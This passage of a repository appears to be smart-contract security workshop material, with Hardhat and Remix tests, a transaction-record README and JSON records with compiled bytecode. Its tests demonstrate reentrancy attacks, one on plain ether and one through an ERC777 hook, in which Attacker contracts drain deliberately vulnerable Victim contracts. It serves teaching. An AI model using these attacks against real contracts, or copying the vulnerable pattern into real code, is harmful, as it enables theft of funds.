"GPL-3.0", 5 | "scripts": { 6 | "compile": "hardhat compile", 7 | "clean": "hardhat clean", 8 | "format": "prettier --write \"./**/*.{ts,js,sol}\"" 9 | }, 10 | "dependencies": { 11 | "@nomiclabs/hardhat-ethers": "^2.0.5", 12 | "@nomiclabs/hardhat-waffle": "^2.0.3", 13 | "@openzeppelin/contracts": "^4.5.0", 14 | "@openzeppelin/test-helpers": "^0.5.15", 15 | "chai": "^4.3.6", 16 | "ethereum-waffle": "^3.4.4", 17 | "ethers": "^5.6.3", 18 | "hardhat": "^2.9.3" 19 | }, 20 | "devDependencies": { 21 | "@nomiclabs/hardhat-waffle": "^2.0.3", 22 | "chai": "^4.3.6", 23 | "hardhat": "^2.9.3", 24 | "prettier": "^2.6.2", 25 | "prettier-plugin-solidity": "^1.0.0-beta.19" 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /remix-compiler.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | solidity: "0.8.6", 3 | settings: { 4 | optimizer: { 5 | enabled: false, 6 | runs: 200, 7 | }, 8 | }, 9 | }; 10 | -------------------------------------------------------------------------------- /tests/js_tests/puzzle1.test.js: -------------------------------------------------------------------------------- 1 | /** Do NOT use this code in production ** 2 | __ __ _ _ _____ _ _ _ 3 | \ \ / / (_| | / ____| | | | | (_) 4 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 5 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 6 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 7 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 8 | __/ | 9 | |___/ 10 | 11 | Verilog Solutions Inc. https://www.verilog.solutions 12 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 13 | validator operations, venture investment, and incubation. 14 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 15 | */ 16 | 17 | const { expect } = require("chai"); 18 | const { ethers } = require("hardhat"); 19 | 20 | // import {""} from "../contracts/puzzle1/artifacts/Attacker1.json"; 21 | // import {} from "../contracts/puzzle1/artifacts/Victim1.json"; 22 | 23 | describe("Puzzle 1", function () { 24 | const ONE_ETHER = ethers.utils.parseUnits("1.0", "ether"); 25 | const initialBalance = ONE_ETHER; 26 | const POINT_FIVE_ETHER = ethers.utils.parseUnits("0.5", "ether"); 27 | const depositAmount = POINT_FIVE_ETHER; 28 | let victim; 29 | let attacker; 30 | let owner; 31 | let addr1; 32 | let addr2; 33 | 34 | beforeEach(async function () { 35 | [owner, addr1, addr2] = await ethers.getSigners(); 36 | 37 | victim = await (await ethers.getContractFactory("Victim1")).deploy({ value: initialBalance }); 38 | 39 | attacker = await (await ethers.getContractFactory("Attacker1")).deploy(victim.address); 40 | }); 41 | 42 | it("Test1: Victim should be initialize with proper initial fund. ", async function () { 43 | const currentBalance = await ethers.provider.getBalance(victim.address); 44 | expect(currentBalance).to.equal(initialBalance); 45 | }); 46 | 47 | it("Test2: Legit user can store ether into Victim.", async function () { 48 | const beforeBalanceUser1 = await addr1.getBalance(); 49 | const beforeBalanceVictim = await ethers.provider.getBalance(victim.address); 50 | 51 | await victim.connect(addr1).deposit({ value: depositAmount }); 52 | 53 | const afterBalanceUser1 = await addr1.getBalance(); 54 | 55 | const afterBalanceVictim = await ethers.provider.getBalance(victim.address); 56 | 57 | // it's gte(greater or equal bc of tx gas cost) 58 | expect(beforeBalanceUser1.sub(afterBalanceUser1)).to.gte(depositAmount); 59 | 60 | expect(afterBalanceVictim.sub(beforeBalanceVictim)).to.equal(depositAmount); 61 | }); 62 | 63 | it("Test3: Legit user can withdraw ether from Victim.", async function () { 64 | // deposit first 65 | await victim.connect(addr1).deposit({ value: depositAmount }); 66 | 67 | const beforeBalanceVictim = await ethers.provider.getBalance(victim.address); 68 | 69 | // withdraw 70 | await victim.connect(addr1).withdraw(addr1.address); 71 | 72 | const afterBalanceVictim = await ethers.provider.getBalance(victim.address); 73 | 74 | expect(beforeBalanceVictim.sub(afterBalanceVictim)).to.equal(depositAmount); 75 | }); 76 | 77 | it("Attack: Attacker can withdraw ether from Victim.", async function () { 78 | const beforeBalanceVictim = await ethers.provider.getBalance(victim.address); 79 | const beforeBalanceAttacker = await ethers.provider.getBalance(attacker.address); 80 | 81 | // balance(Victim) = 1 ether; balance(AttackerDeposit) = .5 ether; 82 | // so it reenter twice (aka withdraw three times) to drain the Victim. 83 | // You'll see in the console logs. 84 | await attacker.connect(addr2).attack({ value: depositAmount }); 85 | 86 | const afterBalanceVictim = await ethers.provider.getBalance(victim.address); 87 | const afterBalanceAttacker = await ethers.provider.getBalance(attacker.address); 88 | 89 | // About `above` and `below`: 90 | // https://ethereum-waffle.readthedocs.io/en/latest/matchers.html#bignumbers 91 | expect(afterBalanceAttacker.sub(beforeBalanceAttacker)).to.above(depositAmount); 92 | // ^ attacker gets more than he deposit 93 | expect(afterBalanceVictim).to.below(beforeBalanceVictim.sub(depositAmount)); 94 | }); 95 | }); 96 | -------------------------------------------------------------------------------- /tests/js_tests/puzzle2.test.js: -------------------------------------------------------------------------------- 1 | /** Do NOT use this code in production ** 2 | __ __ _ _ _____ _ _ _ 3 | \ \ / / (_| | / ____| | | | | (_) 4 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 5 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 6 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 7 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 8 | __/ | 9 | |___/ 10 | 11 | Verilog Solutions Inc. https://www.verilog.solutions 12 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 13 | validator operations, venture investment, and incubation. 14 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 15 | */ 16 | 17 | const { expect } = require("chai"); 18 | const { ethers } = require("hardhat"); 19 | 20 | describe("Puzzle 2", function () { 21 | const ONE_TEN_TOKEN = ethers.utils.parseUnits("10.0", 18); 22 | const initialSupply = ONE_TEN_TOKEN; 23 | const FIVE_TOKEN = ethers.utils.parseUnits("5.0", 18); 24 | const depositAmount = FIVE_TOKEN; 25 | let token; 26 | let victim; 27 | let attacker; 28 | let owner; 29 | let addr1; 30 | let addr2; 31 | 32 | beforeEach(async function () { 33 | [owner, addr1, addr2] = await ethers.getSigners(); 34 | 35 | token = await (await ethers.getContractFactory("ERC777TestToken")).deploy(initialSupply); 36 | 37 | victim = await (await ethers.getContractFactory("Victim2")).deploy(token.address); 38 | 39 | // transfer all token from owner to victim contract 40 | await token.transfer(victim.address, token.balanceOf(owner.address)); 41 | 42 | attacker = await (await ethers.getContractFactory("Attacker2")).deploy(victim.address, token.address); 43 | 44 | /// buy some Token 45 | await token.connect(addr1).buy(addr1.address, { value: depositAmount }); 46 | await token.connect(addr2).buy(addr2.address, { value: depositAmount }); 47 | }); 48 | 49 | it("Test1: Victim should be initialize with proper initial fund (in token). ", async function () { 50 | const currentBalance = await token.balanceOf(victim.address); 51 | expect(currentBalance).to.equal(initialSupply); 52 | }); 53 | 54 | it("Test2: Legit user can deposit token to Victim. ", async function () { 55 | const beforeBalanceVictim = await token.balanceOf(victim.address); 56 | const beforeBalanceUser1 = await token.balanceOf(addr1.address); 57 | 58 | await token.connect(addr1).approve(victim.address, depositAmount); 59 | await victim.connect(addr1).deposit(depositAmount); 60 | 61 | const afterBalanceVictim = await token.balanceOf(victim.address); 62 | const afterBalanceUser1 = await token.balanceOf(addr1.address); 63 | 64 | expect(afterBalanceVictim.sub(beforeBalanceVictim)).to.equal(depositAmount); 65 | expect(beforeBalanceUser1.sub(afterBalanceUser1)).to.equal(depositAmount); 66 | expect(await victim.amounts(addr1.address)).to.equal(depositAmount); 67 | }); 68 | 69 | it("Test3: Legit user can withdraw token from Victim. ", async function () { 70 | // deposit first 71 | await token.connect(addr1).approve(victim.address, depositAmount); 72 | await victim.connect(addr1).deposit(depositAmount); 73 | 74 | const beforeBalanceVictim = await token.balanceOf(victim.address); 75 | const beforeBalanceUser1 = await token.balanceOf(addr1.address); 76 | 77 | await victim.connect(addr1).withdraw(addr1.address); 78 | 79 | const afterBalanceVictim = await token.balanceOf(victim.address); 80 | const afterBalanceUser1 = await token.balanceOf(addr1.address); 81 | 82 | expect(beforeBalanceVictim.sub(afterBalanceVictim)).to.equal(depositAmount); 83 | expect(afterBalanceUser1.sub(beforeBalanceUser1)).to.equal(depositAmount); 84 | expect(await victim.amounts(addr1.address)).to.equal(0); 85 | }); 86 | 87 | it("Attack: Attacker can withdraw more token from Victim than he deposits.", async function () { 88 | const beforeBalanceVictim = await token.balanceOf(victim.address); 89 | const beforeBalanceAttacker = await token.balanceOf(attacker.address); 90 | 91 | // increase allowance[attacker => attacker contract] 92 | await token.connect(addr2).approve(attacker.address, depositAmount); 93 | // attacker contract will spend attacker's AGT in attack() 94 | await attacker.connect(addr2).attack(depositAmount); 95 | 96 | const afterBalanceVictim = await token.balanceOf(victim.address); 97 | const afterBalanceAttacker = await token.balanceOf(attacker.address); 98 | 99 | // About `above` and `below`: 100 | // https://ethereum-waffle.readthedocs.io/en/latest/matchers.html#bignumbers 101 | expect(afterBalanceAttacker.sub(beforeBalanceAttacker)).to.above(depositAmount); 102 | // ^ attacker gets more than he deposit 103 | expect(afterBalanceVictim).to.below(beforeBalanceVictim.sub(depositAmount)); 104 | // ^ victim losses more than attacker should take 105 | }); 106 | }); 107 | -------------------------------------------------------------------------------- /tests/solidity_tests/puzzle1_test.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity ^0.8.0; 19 | 20 | // This import is automatically injected by Remix 21 | import "remix_tests.sol"; 22 | 23 | // This import is required to use custom transaction context 24 | // Although it may fail compilation in 'Solidity Compiler' plugin 25 | // But it will work fine in 'Solidity Unit Testing' plugin 26 | import "remix_accounts.sol"; 27 | // 28 | import "hardhat/console.sol"; 29 | import "../../contracts/puzzle1/Attacker1.sol"; 30 | import "../../contracts/puzzle1/Victim1.sol"; 31 | import "../../contracts/puzzle2/token/ERC777TestToken.sol"; 32 | 33 | // File name has to end with '_test.sol', this file can contain more than one testSuite contracts 34 | contract puzzle1_test { 35 | Victim1 victim; 36 | Attacker1 attacker; 37 | 38 | /// 'beforeAll' runs before all other tests 39 | /// More special functions are: 'beforeEach', 'beforeAll', 'afterEach' & 'afterAll' 40 | /// #sender: account-0 41 | /// #value: 1000000000000000000 42 | function beforeAll() public payable { 43 | // 44 | victim = new Victim1{ value: msg.value }(); // initiate Victim1 with initial funds 45 | attacker = new Attacker1(address(victim)); 46 | } 47 | 48 | /// Test1: Victim1 should be initialize with proper initial fund. 49 | function test_DAOVictim_Initalize() public { 50 | Assert.ok( 51 | address(victim).balance == 1 ether, 52 | "victim contract should be intialized with value 100 " 53 | ); 54 | } 55 | 56 | /// Attack: Attacker can withdraw more ether from Victim1. 57 | /// #sender: account-1 58 | /// #value: 500000000000000000 59 | function attack() public payable { 60 | uint256 depositAmount = msg.value; // 0.5 ether 61 | 62 | uint256 beforeBalanceAttacker = address(attacker).balance; 63 | 64 | attacker.attack{ value: depositAmount }(); 65 | 66 | uint256 afterBalanceAttacker = address(attacker).balance; 67 | 68 | Assert.greaterThan( 69 | afterBalanceAttacker - beforeBalanceAttacker, 70 | depositAmount, 71 | "Attacker should be able to withdraw more funds" 72 | ); 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /tests/solidity_tests/puzzle2_test.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity ^0.8.0; 19 | 20 | // This import is automatically injected by Remix 21 | import "remix_tests.sol"; 22 | 23 | // This import is required to use custom transaction context 24 | // Although it may fail compilation in 'Solidity Compiler' plugin 25 | // But it will work fine in 'Solidity Unit Testing' plugin 26 | import "remix_accounts.sol"; 27 | // 28 | import "hardhat/console.sol"; 29 | import "../../contracts/puzzle2/token/ERC777TestToken.sol"; 30 | import "../../contracts/puzzle2/Victim2.sol"; 31 | import "../../contracts/puzzle2/Attacker2.sol"; 32 | 33 | // File name has to end with '_test.sol', this file can contain more than one testSuite contracts 34 | contract puzzle2_test { 35 | ERC777TestToken token; 36 | Victim2 victim; 37 | Attacker2 attacker; 38 | 39 | /// 'beforeAll' runs before all other tests 40 | /// More special functions are: 'beforeEach', 'beforeAll', 'afterEach' & 'afterAll' 41 | /// #sender: account-0 42 | /// #value: 100 43 | function beforeAll() public payable { 44 | // 45 | token = new ERC777TestToken(0); // token is minted to account-0 46 | 47 | victim = new Victim2(address(token)); 48 | attacker = new Attacker2(address(victim), address(token)); 49 | } 50 | 51 | /// Attacker: Attacker can withdraw more ERC777TestToken from Victim2 than he deposits 52 | /// #sender: account-0 53 | /// #value: 11000000000000000000 54 | function attack() public payable { 55 | // deposit 10 tokens to victim 56 | 57 | token.buy{ value: msg.value }(address(this)); 58 | token.approve(address(attacker), 1e18); 59 | token.approve(address(victim), 10e18); 60 | victim.deposit(10e18); 61 | 62 | // attack 63 | uint256 amount = 1e18; 64 | uint256 balanceBeforeAttacker = token.balanceOf(address(attacker)); 65 | 66 | attacker.attack(amount); 67 | 68 | uint256 balanceAfterAttacker = token.balanceOf(address(attacker)); 69 | 70 | Assert.greaterThan( 71 | balanceAfterAttacker - balanceBeforeAttacker, 72 | amount, 73 | "attacker should revceive more token" 74 | ); 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /tx_records/README.md: -------------------------------------------------------------------------------- 1 | # What Is Included in Records? 2 | 3 | ## Puzzle1 Record 4 | 5 | ``` 6 | ==== Setting ==== 7 | 0. Address1 create DAOVictim with value = 3 ether; 8 | 1. Address2 create DAOAttacker; 9 | ==== Legit User ==== 10 | 2. Address1 call deposit() in DAOVictim with value = 1 ether; 11 | 3. Address1 call withdraw(address to) in DAOVictim with parameter: address to = address(Address1); 12 | ==== Attacker ==== 13 | 4. Address2 call attack() in DAOAttacker with value = 1 ether; 14 | ``` 15 | 16 | ## Puzzle2 Record 17 | 18 | ``` 19 | ==== Setting ==== 20 | 0. erc777Token = ERC777Token.deploy(initialSupply); 21 | 1. victim = Victim.deploy(erc777Token.address); 22 | 2. erc777Token.connect(owner).transfer(victim.address, initialSupply); 23 | 3. attacker = Attacker.deploy(victim.address, erc777Token.address); 24 | 4. erc777Token.connect(addr1).buy({ value: depositAmount }); 25 | 5. erc777Token.connect(addr2).buy({ value: depositAmount }); 26 | ==== Legit User ==== 27 | 6. erc777Token.connect(addr1).approve(victim.address, depositAmount); 28 | 7. victim.connect(addr1).deposit(depositAmount); 29 | 8. victim.connect(addr1).withdraw(addr1.address); 30 | ==== Attacker ==== 31 | 9. erc777Token.connect(addr2).approve(attacker.address, depositAmount); 32 | 10. attacker.connect(addr2).attack(depositAmount); 33 | ``` 34 | -------------------------------------------------------------------------------- /tx_records/puzzle1.json: -------------------------------------------------------------------------------- 1 | { 2 | "accounts": { 3 | "account{0}": "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4", 4 | "account{1}": "0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2" 5 | }, 6 | "linkReferences": {}, 7 | "transactions": [ 8 | { 9 | "timestamp": 1650162569424, 10 | "record": { 11 | "value": "3000000000000000000", 12 | "parameters": [], 13 | "abi": "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0", 14 | "contractName": "Victim1", 15 | "bytecode": "60806040526108e5806100136000396000f3fe6080604052600436106100345760003560e01c806351cff8d91461003957806355a3b2c114610062578063d0e30db01461009f575b600080fd5b34801561004557600080fd5b50610060600480360381019061005b9190610524565b6100a9565b005b34801561006e57600080fd5b5061008960048036038101906100849190610524565b6102a3565b60405161009691906106be565b60405180910390f35b6100a76102bb565b005b60008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905061012b6040518060400160405280601c81526020017f56696374696d3a3a2061646472657373287468697329206861733a200000000081525047610312565b61014d6040518060600160405280602981526020016108876029913982610312565b61016f60405180606001604052806032815260200161085560329139836103ae565b60008273ffffffffffffffffffffffffffffffffffffffff1682604051610195906105f9565b60006040518083038185875af1925050503d80600081146101d2576040519150601f19603f3d011682016040523d82523d6000602084013e6101d7565b606091505b5050905061021a6040518060400160405280601f81526020017f56696374696d3a3a207472616e736665722063616c6c207374617475733a20008152508261044a565b8061025a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016102519061069e565b60405180910390fd5b60008060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b60006020528060005260406000206000915090505481565b346000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546103099190610700565b92505081905550565b6103aa828260405160240161032892919061066e565b6040516020818303038152906040527f9710a9d0000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050506104e6565b5050565b61044682826040516024016103c492919061060e565b6040516020818303038152906040527f319af333000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050506104e6565b5050565b6104e2828260405160240161046092919061063e565b6040516020818303038152906040527fc3b55635000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050506104e6565b5050565b60008151905060006a636f6e736f6c652e6c6f679050602083016000808483855afa5050505050565b60008135905061051e8161083d565b92915050565b60006020828403121561053657600080fd5b60006105448482850161050f565b91505092915050565b61055681610756565b82525050565b61056581610768565b82525050565b6000610576826106d9565b61058081856106ef565b935061059081856020860161079e565b61059981610800565b840191505092915050565b60006105b16016836106ef565b91506105bc82610811565b602082019050919050565b60006105d46000836106e4565b91506105df8261083a565b600082019050919050565b6105f381610794565b82525050565b6000610604826105c7565b9150819050919050565b60006040820190508181036000830152610628818561056b565b9050610637602083018461054d565b9392505050565b60006040820190508181036000830152610658818561056b565b9050610667602083018461055c565b9392505050565b60006040820190508181036000830152610688818561056b565b905061069760208301846105ea565b9392505050565b600060208201905081810360008301526106b7816105a4565b9050919050565b60006020820190506106d360008301846105ea565b92915050565b600081519050919050565b600081905092915050565b600082825260208201905092915050565b600061070b82610794565b915061071683610794565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561074b5761074a6107d1565b5b828201905092915050565b600061076182610774565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b838110156107bc5780820151818401526020810190506107a1565b838111156107cb576000848401525b50505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000601f19601f8301169050919050565b7f44414f3a3a205769746864726177206661696c65642e00000000000000000000600082015250565b50565b61084681610756565b811461085157600080fd5b5056fe56696374696d3a3a203e3e3e2048616e64696e67206f76657220636f6e74726f6c20746f206164647265737328746f293a2056696374696d3a3a207472616e7366657220616d6f756e7420746f206164647265737328746f293a20a2646970667358221220d561573ee7965f4c0f2cc9aeca4b4ab2f24044a7dd3964dedba7f6a6c02583a664736f6c63430008040033", 16 | "linkReferences": {}, 17 | "name": "", 18 | "inputs": "()", 19 | "type": "constructor", 20 | "from": "account{0}" 21 | } 22 | }, 23 | { 24 | "timestamp": 1650162593412, 25 | "record": { 26 | "value": "0", 27 | "parameters": [ 28 | "created{1650162569424}" 29 | ], 30 | "abi": "0x28e2ec147ccaac8c352ab53bd66b8187d2ab8c0dc4b881cec5748aa81d5051b5", 31 | "contractName": "Attacker1", 32 | "bytecode": "608060405234801561001057600080fd5b506040516108463803806108468339818101604052810190610032919061008d565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610111565b600081519050610087816100fa565b92915050565b60006020828403121561009f57600080fd5b60006100ad84828501610078565b91505092915050565b60006100c1826100da565b9050919050565b60006100d3826100b6565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b610103816100c8565b811461010e57600080fd5b50565b610726806101206000396000f3fe60806040526004361061002d5760003560e01c8063930c2003146102065780639e5faafc1461023157610201565b366102015761007460405180606001604052806039815260200161068b6039913960008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661023b565b6100ea6040518060400160405280601b81526020017f41747461636b65723a3a2056696374696d2042616c616e63653a20000000000081525060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16316102d7565b670de0b6b3a764000060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163111156101ff576101736040518060600160405280602d81526020016106c4602d913960008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661023b565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166351cff8d9306040518263ffffffff1660e01b81526004016101cc9190610534565b600060405180830381600087803b1580156101e657600080fd5b505af11580156101fa573d6000803e3d6000fd5b505050505b005b600080fd5b34801561021257600080fd5b5061021b610373565b604051610228919061054f565b60405180910390f35b610239610397565b005b6102d3828260405160240161025192919061056a565b6040516020818303038152906040527f319af333000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050506104a5565b5050565b61036f82826040516024016102ed92919061059a565b6040516020818303038152906040527f9710a9d0000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050506104a5565b5050565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663d0e30db0346040518263ffffffff1660e01b81526004016000604051808303818588803b1580156103ff57600080fd5b505af1158015610413573d6000803e3d6000fd5b505050505060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166351cff8d9306040518263ffffffff1660e01b81526004016104719190610534565b600060405180830381600087803b15801561048b57600080fd5b505af115801561049f573d6000803e3d6000fd5b50505050565b60008151905060006a636f6e736f6c652e6c6f679050602083016000808483855afa5050505050565b6104d7816105e6565b82525050565b6104e681610622565b82525050565b60006104f7826105ca565b61050181856105d5565b9350610511818560208601610646565b61051a81610679565b840191505092915050565b61052e81610618565b82525050565b600060208201905061054960008301846104ce565b92915050565b600060208201905061056460008301846104dd565b92915050565b6000604082019050818103600083015261058481856104ec565b905061059360208301846104ce565b9392505050565b600060408201905081810360008301526105b481856104ec565b90506105c36020830184610525565b9392505050565b600081519050919050565b600082825260208201905092915050565b60006105f1826105f8565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600061062d82610634565b9050919050565b600061063f826105f8565b9050919050565b60005b83811015610664578082015181840152602081019050610649565b83811115610673576000848401525b50505050565b6000601f19601f830116905091905056fe41747461636b65723a3a203e3e3e2054616b696e67206f76657220636f6e74726f6c2066726f6d20616464726573732876696374696d293a2041747461636b65723a3a2042616c616e6365203e20316520746865722c205265656e746572696e67203e3e3e20a2646970667358221220877618c33ac25d9b52e67ced3cd9b8dcaaf402671aa3fb9d87eb9072fd7273c364736f6c63430008040033", 33 | "linkReferences": {}, 34 | "name": "", 35 | "inputs": "(address)", 36 | "type": "constructor", 37 | "from": "account{1}" 38 | } 39 | }, 40 | { 41 | "timestamp": 1650162601974, 42 | "record": { 43 | "value": "1000000000000000000", 44 | "parameters": [], 45 | "to": "created{1650162569424}", 46 | "abi": "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0", 47 | "name": "deposit", 48 | "inputs": "()", 49 | "type": "function", 50 | "from": "account{0}" 51 | } 52 | }, 53 | { 54 | "timestamp": 1650162608009, 55 | "record": { 56 | "value": "0", 57 | "parameters": [ 58 | "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4" 59 | ], 60 | "to": "created{1650162569424}", 61 | "abi": "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0", 62 | "name": "withdraw", 63 | "inputs": "(address)", 64 | "type": "function", 65 | "from": "account{0}" 66 | } 67 | }, 68 | { 69 | "timestamp": 1650162640115, 70 | "record": { 71 | "value": "1000000000000000000", 72 | "parameters": [], 73 | "to": "created{1650162593412}", 74 | "abi": "0x28e2ec147ccaac8c352ab53bd66b8187d2ab8c0dc4b881cec5748aa81d5051b5", 75 | "name": "attack", 76 | "inputs": "()", 77 | "type": "function", 78 | "from": "account{1}" 79 | } 80 | } 81 | ], 82 | "abis": { 83 | "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0": [ 84 | { 85 | "inputs": [], 86 | "name": "deposit", 87 | "outputs": [], 88 | "stateMutability": "payable", 89 | "type": "function" 90 | }, 91 | { 92 | "inputs": [], 93 | "stateMutability": "payable", 94 | "type": "constructor" 95 | }, 96 | { 97 | "inputs": [ 98 | { 99 | "internalType": "address", 100 | "name": "to", 101 | "type": "address" 102 | } 103 | ], 104 | "name": "withdraw", 105 | "outputs": [], 106 | "stateMutability": "nonpayable", 107 | "type": "function" 108 | }, 109 | { 110 | "inputs": [ 111 | { 112 | "internalType": "address", 113 | "name": "", 114 | "type": "address" 115 | } 116 | ], 117 | "name": "amounts", 118 | "outputs": [ 119 | { 120 | "internalType": "uint256", 121 | "name": "", 122 | "type": "uint256" 123 | } 124 | ], 125 | "stateMutability": "view", 126 | "type": "function" 127 | } 128 | ], 129 | "0x28e2ec147ccaac8c352ab53bd66b8187d2ab8c0dc4b881cec5748aa81d5051b5": [ 130 | { 131 | "inputs": [], 132 | "name": "attack", 133 | "outputs": [], 134 | "stateMutability": "payable", 135 | "type": "function" 136 | }, 137 | { 138 | "inputs": [ 139 | { 140 | "internalType": "contract IDAOVictim", 141 | "name": "victim_address", 142 | "type": "address" 143 | } 144 | ], 145 | "stateMutability": "nonpayable", 146 | "type": "constructor" 147 | }, 148 | { 149 | "stateMutability": "payable", 150 | "type": "receive" 151 | }, 152 | { 153 | "inputs": [], 154 | "name": "victim", 155 | "outputs": [ 156 | { 157 | "internalType": "contract IDAOVictim", 158 | "name": "", 159 | "type": "address" 160 | } 161 | ], 162 | "stateMutability": "view", 163 | "type": "function" 164 | } 165 | ] 166 | } 167 | } -------------------------------------------------------------------------------- /tx_records/puzzle2.json: -------------------------------------------------------------------------------- 1 | { 2 | "accounts": { 3 | "account{0}": "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4", 4 | "account{1}": "0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2" 5 | }, 6 | "linkReferences": {}, 7 | "transactions": [ 8 | { 9 | "timestamp": 1650474338320, 10 | "record": { 11 | "value": "0", 12 | "parameters": [ 13 | "10000000000000000000" 14 | ], 15 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 16 | "contractName": "ERC777TestToken", 17 | "bytecode": 